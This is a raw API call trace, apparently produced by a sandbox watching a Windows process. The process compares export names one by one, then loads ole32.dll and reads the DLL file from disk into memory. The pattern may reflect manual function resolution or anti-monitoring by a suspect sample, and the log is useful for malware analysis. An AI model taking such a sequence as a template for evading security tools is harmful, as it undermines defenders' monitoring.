lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.803] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0212.804] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0212.805] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.806] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.806] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.807] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0212.808] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0212.809] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0212.810] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0212.810] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0212.810] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0213.820] GetProcessHeap () returned 0x560000 [0213.820] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db2010 | out: hHeap=0x560000) returned 1 [0215.289] GetProcessHeap () returned 0x560000 [0215.289] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579190 [0215.291] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0215.291] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0215.292] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0215.292] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0215.292] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0215.293] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0215.293] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0215.294] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0215.294] GetProcessHeap () returned 0x560000 [0215.294] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x142d00) returned 0x4175040 [0215.298] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0215.298] ReadFile (in: hFile=0x140, lpBuffer=0x4175040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4175040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0215.754] CloseHandle (hObject=0x140) returned 1 [0215.755] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0215.755] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 